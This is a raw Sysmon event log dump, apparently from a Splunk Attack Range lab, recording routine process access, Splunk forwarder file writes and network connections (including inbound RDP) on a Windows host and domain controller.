10341000x8000000000000000976390Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:37.733{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976389Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:37.733{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976388Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:37.733{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976387Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:37.733{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976386Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:37.733{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976385Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:37.733{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976384Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:37.733{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976383Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:37.733{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976382Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:37.733{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8835-6151-7979-00000000FD01}3900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000976381Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:37.733{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8835-6151-7979-00000000FD01}3900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000976380Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:37.719{69CF5F33-8835-6151-7979-00000000FD01}3900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000976379Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:37.327{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC4DC336A22C898F688C7742EB3F306B,SHA256=71F168B04D308DCF2CD2A81664827E796783A5A89B03E9EB5894D677365EF76C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047817Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:37.184{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D82C44696431A81D451EA42E033286C8,SHA256=91338715517774137763B423D5EEF366D745CE89E47DAA04680CCE8A923E0F5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976394Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:38.733{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B90E682BDF9DF5CC4452C781DB3B6DC1,SHA256=851DFF16743D2C3D5D1A7EEBC99D4E5F268BF060FB459A2A2AF730F2899069F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976393Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:38.342{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BBF77C69057F17F3E2A9908F2A79E6D9,SHA256=F225E2701A66F2047B4047B4CAABA92AC9FC203A6CAC1643261A8D3CB1FF59B1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047819Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:36.055{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49209-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x80000000000000001047818Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:38.214{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2822B05514710A676081B236BBB6D7D9,SHA256=CC97B48F04232BDE6D94723F1A678E445F28FFC0C3819AD6D5212E681F296DE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976396Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:39.530{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA4BD80C75970FE3022C2ADCC2D9FC98,SHA256=9A9B585597FE389A0648C0A2B5E861A04C0D095E259664E20BA757205E45CA42,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047822Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:37.753{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49210-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001047821Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:39.229{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E6373EF878AD2CA35FE7F7D4BEA45D6,SHA256=AF1C1EA8224BDCFFAA2A0CE8A7968835F3858EE20EA150F9899BB2EF52752F9B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976395Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:35.822{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-2356-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001047820Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:39.164{5EBD8912-7F30-614D-1200-00000000FC01}492NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=071499FD3A23D6C220041F410D7E4997,SHA256=158180F0F90DDEBE1B8846C2C0F708EA962FE3DABB74DA0AFE3BE1DD448E9634,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976399Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:40.561{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63634AA65EFBA586574F929EF994F9B6,SHA256=9A91D57EDE6FEE39026F028298464AF269BA315A697B0311ED1F028D5BA2525A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047824Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:40.913{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=72C4E2B63B190FD55E22352E80BEBA4E,SHA256=018884482B423466E51DF30CD7F427AE02ABA6C4731977B37F85935B6D39707C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047823Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:40.244{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08824D6E71B1119BFC70AF907CE2EF9B,SHA256=10680AB9F0A962A535DDEA9C79D57878A4F7049C9CFEA70633BED2F297EC4B02,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976398Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:36.887{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-56037-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000976397Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:36.877{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59250-false10.0.1.12-8000- 23542300x8000000000000000976401Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:41.593{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E09EE3A0C87CA107E5B560387BDD6F8,SHA256=1DA7174DE2E2B54A3759B1A3DEF6D6E13671CB68AAF1641B6AE09F7DC493CE19,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047826Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:39.319{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-64113-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001047825Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:41.263{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA769FE0A4508625B1F519EEB120BF10,SHA256=C3A4DA3D5B432C4E73F911CD1BF2E27273ADC86D58EE60E5E32C144E8BEE59CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976400Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:41.046{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=757E352371CCFB2253D9DF96A449390F,SHA256=121608F0F85D2CEC24024F68C16DE3189E2E54BCD04B776A510F50755D4FEF15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976402Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:42.610{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1F0B99811ECD3616F0FAB6FF4EA7FA6,SHA256=828D0389B4AF656EE89BDCAFE41B73AF8989FCB20C65289516B7005B21DAC46D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047829Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:40.508{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-57676-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001047828Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:42.395{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=92E3162F2DE9129347E07CCB0C0C48CF,SHA256=BAFE24AE5F7A395ABDB9B39ADF6C64026974BB72FEAC2AF01DAF4B468CBB13BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047827Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:42.285{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=401CC775D85D3EDB93723DE655FF177A,SHA256=98114710419F5E539B36B258812E3B859639949E732F47750DDD3CB0C3755C1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976403Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:43.669{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30DA5A8B2195C9DC764DF78FF7D2708A,SHA256=00C65C43B63DB84F16EA70BCAD7BA6FA2BECB1C947A24790E3C3712B253A74A3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047831Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:43.978{5EBD8912-7B3A-6151-3A78-00000000FC01}71203376C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001047830Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:43.359{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91A6646281ECAD6E75E1E9D239EA7B43,SHA256=C20BBE8A792BA8D64C280E356B791A7D7A53549BA46D56F8983E277FC1D9C3DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976405Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:44.685{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDA46816397FAC389E86F56AA9C4F72C,SHA256=F2AF579B4D90CB7199D73662768795C26CF0CFBC9DC4F80BB76A54B7CA665B05,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047841Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:44.709{5EBD8912-7B3A-6151-3A78-00000000FC01}71203376C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047840Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:44.662{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-883C-6151-E579-00000000FC01}664C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 